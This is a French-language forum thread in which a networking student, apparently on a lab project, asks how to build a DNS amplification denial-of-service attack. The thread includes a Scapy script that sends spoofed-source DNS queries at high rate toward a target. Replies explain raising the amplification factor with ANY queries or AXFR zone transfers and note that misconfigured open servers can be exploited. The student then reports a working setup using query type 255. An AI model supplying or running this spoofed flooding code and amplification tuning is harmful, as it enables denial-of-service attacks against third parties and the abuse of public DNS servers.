Bonjour

Je suis actuellement en 2ème année de DUT réseau et télécommunication.
Dans le cadre d'un projet je dois crée un DOS par amplification DNS, ma question est la suivante

Comment augmenter la taille d'une réponse DNS.
J'ai créer un DNS sur une machine virtuelle windows serveur 2012 qui servira d'amplificateur.
J'ai aussi forgé une requête DNS en scapy que je peux également changer le voici.

#! /usr/bin/python
from scapy.all import *


dns = Ether()/IP(dst="172.16.0.2",src="172.16.0.100")/UDP()/DNS()
dns.sport=1785
dns.dport=53
dns.rd=1
dns.qd=DNSQR(qname="www.google.fr")
sendpfast(dns,pps=100000,loop=100000)

Avec wireshark j'ai vu que j'envoyais 70 bits pour que la cible en recoivent 90.
C'est peu j'aimerais atteindre une amplification de *10 voir *20 si possible.

Merci d'avance

Bonjour,

Plutôt que de regarder la taille, regarde le contenu de la réponse

Quelle requête DNS fais-tu exactement? Que demandes-tu à ton serveur? Pourrais-tu lui demander autre chose?

Plutôt qu'une recherche simple d'un enregistrement A, cherche à faire un transfert de zone ou une requête qui produira une réponse importante. Comme un serveur qui a 15 enregistrements A.

Merci de vos réponses.

C'est une Requête standard (Query).
Je demande a mon serveur l'adresse IP de google.fr.
Je ne sais pas tu sous entendrais que je pourrais demander plusieurs IP de site web en une requête ?

elalitte a écrit:

Plutôt qu'une recherche simple d'un enregistrement A, cherche à faire un transfert de zone ou une requête qui produira une réponse importante. Comme un serveur qui a 15 enregistrements A.

Je n'ai pas bien compris ce que tu as demander.
Que veux tu dire par transfert de zone ?
Créer une réponse importante est justement mon but.

Merci a vous deux.

-
Edité par kurvahdid 3 décembre 2018 à 11:36:46

En gros en DNS tu as différents types de requêtes, A, NS, CNAME, MX, etc.

Lors d'un transfert de zone, tu ne fais qu'une requête, mais le serveur te répond avec toutes les informations qu'il contient. La réponse est donc énorme. Tu peux utiliser pour ça le type ANY.

elalitte@MacBook-Air-de-eric:~/.ssh$ dig microsoft.com ANY

; <<>> DiG 9.10.6 <<>> microsoft.com ANY
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59558
;; flags: qr rd ra; QUERY: 1, ANSWER: 21, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;microsoft.com.			IN	ANY

;; ANSWER SECTION:
microsoft.com.		3599	IN	A	104.215.148.63
microsoft.com.		3599	IN	A	13.77.161.179
microsoft.com.		3599	IN	A	40.76.4.15
microsoft.com.		3599	IN	A	40.112.72.205
microsoft.com.		3599	IN	A	40.113.200.201
microsoft.com.		21599	IN	NS	ns1.msft.net.
microsoft.com.		21599	IN	NS	ns2.msft.net.
microsoft.com.		21599	IN	NS	ns3.msft.net.
microsoft.com.		21599	IN	NS	ns4.msft.net.
microsoft.com.		3599	IN	SOA	ns1.msft.net. msnhst.microsoft.com. 2018120301 7200 600 2419200 3600
microsoft.com.		3599	IN	MX	10 microsoft-com.mail.protection.outlook.com.
microsoft.com.		3599	IN	TXT	"adobe-sign-verification=c1fea9b4cdd4df0d5778517f29e0934"
microsoft.com.		3599	IN	TXT	"v=spf1 include:_spf-a.microsoft.com include:_spf-b.microsoft.com include:_spf-c.microsoft.com include:_spf-ssg-a.microsoft.com include:spf-a.hotmail.com ip4:147.243.128.24 ip4:147.243.128.26 ip4:147.243.1.153 ip4:147.243.1.47 ip4:147.243.1.48 -all"
microsoft.com.		3599	IN	TXT	"FbUF6DbkE+Aw1/wi9xgDi8KVrIIZus5v8L6tbIQZkGrQ/rVQKJi8CjQbBtWtE64ey4NJJwj5J65PIggVYNabdQ=="
microsoft.com.		3599	IN	TXT	"docusign=d5a3737c-c23c-4bd0-9095-d2ff621f2840"
microsoft.com.		3599	IN	TXT	"google-site-verification=6P08Ow5E-8Q0m6vQ7FMAqAYIDprkVV8fUf_7hZ4Qvc8"
microsoft.com.		3599	IN	TXT	"facebook-domain-verification=gx5s19fp3o8aczby6a22clfhzm03as"
microsoft.com.		3599	IN	TXT	"facebook-domain-verification=bcas5uzlvu0s3mrw139a00os3o66wr"
microsoft.com.		3599	IN	TXT	"docusign=52998482-393d-46f7-95d4-15ac6509bfdd"
microsoft.com.		3599	IN	TXT	"facebook-domain-verification=m54hfzczreqq2z1pf99y2p0kpwwpkv"
microsoft.com.		3599	IN	TXT	"atlassian-domain-verification=jbey7I2+3Wyl+PZ0QUCC6fCz2Gu5KO7GQPcy/0c4za7ebQxar/qqujJH4kZLVQHZ"

;; Query time: 40 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Mon Dec 03 17:24:29 CET 2018
;; MSG SIZE  rcvd: 1248

Normalement, si le serveur est bien configuré, il n'est pas censé accepter des transferts de zone, mais dès lors que tu as trouvé un serveur qui l'accepte, tu peux l'utiliser. Le type ANY passera le plus souvent.

Bonjour je poste avec un autre compte.

J'ai compris que je devais faire une requête de type ANY mas wireshark met un message d'erreur indiquant que le type de requête est mauvais.
De plus j'ai chercher sur le net tout les types de requêtes DNS existantes mais les requêtes ANY n'existe pas.
wikipedia . org/wiki/Liste_des_enregistrements_DNS

J'ai donc utilisé les requêtes de transfert de zone donc AXFR mais quand j'envoie une requête de ce type wireshark indique cette fois ci :
" No such name AXFR www.google.fr"

Dois-je utiliser AXFR ou ANY ?
Si c'est ANY quel est le numero de son type car je ne le trouve pas sur le net.
Si c'est AXFR comment dois-je faire pour que le DNS me renvoie toutes les données de google ?

Alors, si tu veux utiliser ANY, il te suffit de regarder avec wireshark le contenu du paquet pour voir les types positionnés. Regarde les valeurs hexadécimales plutôt que l'interprétation qu'en fait wireshark.

Si tu veux utiliser AXFR, il faut que tu trouves un serveur DNS mal configuré qui accepte les transferts de zone, ce qui ne devrait pas être le cas des serveurs de google...

Merci beaucoup après beaucoup de pratique j'ai finalisé mon programme maintenant j'obtiens une amplification de 85 % environ en faisant une requête de type any pour l'url youtube.fr.

Pour ce qui se demande comment faire la requete de type ANY il ne faut pas écrire une "*" comme dit dans ce lien :https://en.wikipedia.org/wiki/List_of_DNS_record_types
Mais écrire le chiffre 255.

Merci beaucoup bonne journée à vous.